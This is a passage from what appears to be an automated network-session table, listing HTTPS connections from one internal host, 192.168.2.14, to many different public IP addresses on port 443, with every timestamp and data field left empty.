                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23418192.168.2.1444702192.95.171.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23419192.168.2.1455274115.60.217.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23420192.168.2.144880871.198.178.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23421192.168.2.1440638119.89.190.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23422192.168.2.1450114119.243.39.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23423192.168.2.1449898118.199.224.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23424192.168.2.144595020.49.41.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23425192.168.2.143610075.247.82.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23426192.168.2.1441434199.100.20.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23427192.168.2.145858266.16.160.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23428192.168.2.1438034141.135.211.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23429192.168.2.1459344157.91.162.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23430192.168.2.1448658180.25.84.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23431192.168.2.1458602133.97.247.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23432192.168.2.1455112150.23.163.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23433192.168.2.1452492192.108.194.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23434192.168.2.144131637.194.22.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23435192.168.2.1444906113.115.245.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23436192.168.2.1451928117.105.181.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23437192.168.2.1445306168.28.134.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23438192.168.2.145001057.12.48.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23439192.168.2.1447048106.151.246.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23440192.168.2.1454432182.235.7.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23441192.168.2.144521451.254.207.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23442192.168.2.143857080.209.53.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23443192.168.2.143965695.89.50.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23444192.168.2.1434740220.69.96.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23445192.168.2.144848890.138.154.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23446192.168.2.1453698173.13.178.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23447192.168.2.1436294197.208.73.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23448192.168.2.1456400147.171.230.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23449192.168.2.144851496.87.245.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23450192.168.2.1457296193.71.176.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23451192.168.2.1442074194.54.38.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23452192.168.2.1460184182.177.209.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23453192.168.2.145316254.218.39.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23454192.168.2.1437318146.165.233.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23455192.168.2.1452640201.108.243.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23456192.168.2.145793252.225.179.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23457192.168.2.1455756204.17.86.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23458192.168.2.144399018.119.10.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23459192.168.2.1451228176.62.251.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23460192.168.2.1440352135.103.62.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23461192.168.2.145447050.208.237.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23462192.168.2.144340650.229.187.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23463192.168.2.1437968223.92.35.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23464192.168.2.1435046180.188.251.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23465192.168.2.1441270217.74.170.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23466192.168.2.14360528.253.217.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23467192.168.2.1437380171.77.112.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23468192.168.2.1453976194.146.79.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23469192.168.2.144327863.203.175.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23470192.168.2.1450948157.137.73.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23471192.168.2.143996614.18.186.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23472192.168.2.145477666.179.73.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23473192.168.2.144036220.143.46.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23474192.168.2.143448487.194.175.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23475192.168.2.1444248156.25.242.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23476192.168.2.1451556113.127.50.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23477192.168.2.1437236213.236.248.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23478192.168.2.145352820.92.133.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23479192.168.2.1454892170.3.141.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23480192.168.2.1439300195.154.232.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23481192.168.2.1450406114.239.109.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23482192.168.2.1456864204.208.2.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23483192.168.2.1444986186.134.176.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23484192.168.2.145694276.1.226.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23485192.168.2.1443680124.153.233.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23486192.168.2.1448746147.104.112.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23487192.168.2.1451920148.168.43.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23488192.168.2.145940293.23.24.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23489192.168.2.1436814204.216.161.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23490192.168.2.1439280155.91.1.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23491192.168.2.1451686185.184.133.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23492192.168.2.1460500167.97.38.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23493192.168.2.1433288106.6.202.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23494192.168.2.1456530198.14.161.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23495192.168.2.1438472181.186.162.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23496192.168.2.14370729.84.245.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23497192.168.2.1439632145.96.23.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23498192.168.2.1453732190.38.92.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23499192.168.2.1443032180.161.3.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23500192.168.2.143419650.116.143.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23501192.168.2.1433474106.236.201.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23502192.168.2.1441622148.33.123.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23503192.168.2.145761253.41.54.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23504192.168.2.143305484.55.137.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23505192.168.2.144958683.78.168.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23506192.168.2.145800495.26.129.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23507192.168.2.1456280174.241.212.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23508192.168.2.1444554131.189.52.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23509192.168.2.1434226189.237.12.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23510192.168.2.1434764196.61.247.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23511192.168.2.145995494.10.47.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23512192.168.2.143478037.134.46.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23513192.168.2.144313696.178.14.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23514192.168.2.1452810155.63.84.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23515192.168.2.1457022195.87.214.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23516192.168.2.1458338158.79.24.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23517192.168.2.1438380142.58.138.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23518192.168.2.1448732169.87.1.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23519192.168.2.1447308187.132.95.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23520192.168.2.144814618.231.130.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23521192.168.2.144507045.104.7.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23522192.168.2.1433422209.184.35.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23523192.168.2.1437640165.172.47.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23524192.168.2.1433722150.135.59.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23525192.168.2.144379812.23.239.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23526192.168.2.143698499.135.235.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23527192.168.2.145733649.14.38.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23528192.168.2.1439696102.129.46.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23529192.168.2.1433142170.29.50.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23530192.168.2.144260252.185.219.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23531192.168.2.143777073.197.75.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23532192.168.2.143776080.150.49.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23533192.168.2.145292880.124.203.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23534192.168.2.1437564201.124.221.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23535192.168.2.1455106192.223.150.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23536192.168.2.143484273.167.120.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23537192.168.2.144142682.148.243.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23538192.168.2.143598654.48.222.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23539192.168.2.1446242114.66.128.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23540192.168.2.1459236106.42.81.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23541192.168.2.143383248.74.19.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23542192.168.2.144757846.183.11.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23543192.168.2.1440706172.103.184.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23544192.168.2.1438952166.124.23.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23545192.168.2.144836827.143.146.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23546192.168.2.1432802108.120.214.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23547192.168.2.1456988189.237.202.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23548192.168.2.144961254.101.230.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23549192.168.2.1436438145.13.234.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23550192.168.2.1437234103.132.15.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23551192.168.2.1449186137.62.134.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23552192.168.2.1433742210.98.16.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23553192.168.2.1459488101.20.38.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23554192.168.2.1434286223.198.49.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23555192.168.2.143562672.181.164.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23556192.168.2.143964641.32.42.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23557192.168.2.1448042166.29.155.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23558192.168.2.1438184194.133.44.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23559192.168.2.146083619.238.170.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23560192.168.2.145847240.43.26.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23561192.168.2.1453476206.30.70.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23562192.168.2.145054277.130.243.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23563192.168.2.1446170157.157.11.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23564192.168.2.1451048181.214.54.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23565192.168.2.144638067.113.133.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23566192.168.2.144390870.44.28.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23567192.168.2.1439404218.110.106.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23568192.168.2.145477465.236.193.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23569192.168.2.143347842.253.136.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23570192.168.2.1437604134.45.48.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23571192.168.2.143686234.66.140.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23572192.168.2.144559671.165.75.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23573192.168.2.144941435.119.226.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23574192.168.2.1439210202.186.211.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23575192.168.2.144589088.73.114.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23576192.168.2.1446734199.137.122.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23577192.168.2.1440366104.189.241.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23578192.168.2.1450132167.235.224.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23579192.168.2.143394654.232.12.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23580192.168.2.145096076.158.37.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23581192.168.2.14576541.44.72.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23582192.168.2.1434418179.175.178.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23583192.168.2.1437308156.82.110.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23584192.168.2.1447450160.252.89.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23585192.168.2.1458112191.56.237.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23586192.168.2.1456098188.243.165.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23587192.168.2.1452682149.30.32.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23588192.168.2.143958458.121.249.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23589192.168.2.144851057.8.2.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23590192.168.2.145721866.155.77.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23591192.168.2.14522049.129.217.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23592192.168.2.1453084186.39.81.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23593192.168.2.1460676103.159.138.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23594192.168.2.144904638.92.223.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23595192.168.2.1452526166.6.168.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23596192.168.2.1457518194.180.202.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23597192.168.2.1457796198.186.104.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23598192.168.2.144261471.69.115.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23599192.168.2.143996232.186.0.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23600192.168.2.1440276216.32.84.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23601192.168.2.1436620123.76.52.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23602192.168.2.1435982105.45.94.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23603192.168.2.1458778128.177.15.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23604192.168.2.1451676121.161.173.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23605192.168.2.145455235.34.202.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23606192.168.2.1451788185.77.152.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23607192.168.2.1448742170.45.108.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23608192.168.2.1448180109.10.194.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23609192.168.2.143407876.253.88.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23610192.168.2.1459816186.95.114.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23611192.168.2.14529568.19.80.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23612192.168.2.1456936133.150.126.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23613192.168.2.1445602186.158.218.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23614192.168.2.145034075.20.184.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23615192.168.2.1456978192.251.86.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23616192.168.2.144745662.34.61.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23617192.168.2.1445056211.70.158.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23618192.168.2.1447620174.167.195.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23619192.168.2.1446436178.218.54.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23620192.168.2.145837299.144.34.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23621192.168.2.1446256103.97.60.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23622192.168.2.1448278113.92.101.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23623192.168.2.144928682.25.107.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23624192.168.2.145804880.154.229.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23625192.168.2.1456212203.87.7.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23626192.168.2.1442014117.128.81.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23627192.168.2.1457854222.96.106.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23628192.168.2.144772019.28.249.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23629192.168.2.1436114132.52.47.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23630192.168.2.1455572134.73.242.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23631192.168.2.1451760137.9.222.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23632192.168.2.1448404153.35.200.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23633192.168.2.1438130193.125.79.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23634192.168.2.144139486.6.11.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23635192.168.2.1453458213.171.124.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23636192.168.2.1457634184.49.142.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23637192.168.2.143555468.134.76.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23638192.168.2.1436510147.87.133.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23639192.168.2.143712820.38.66.43443
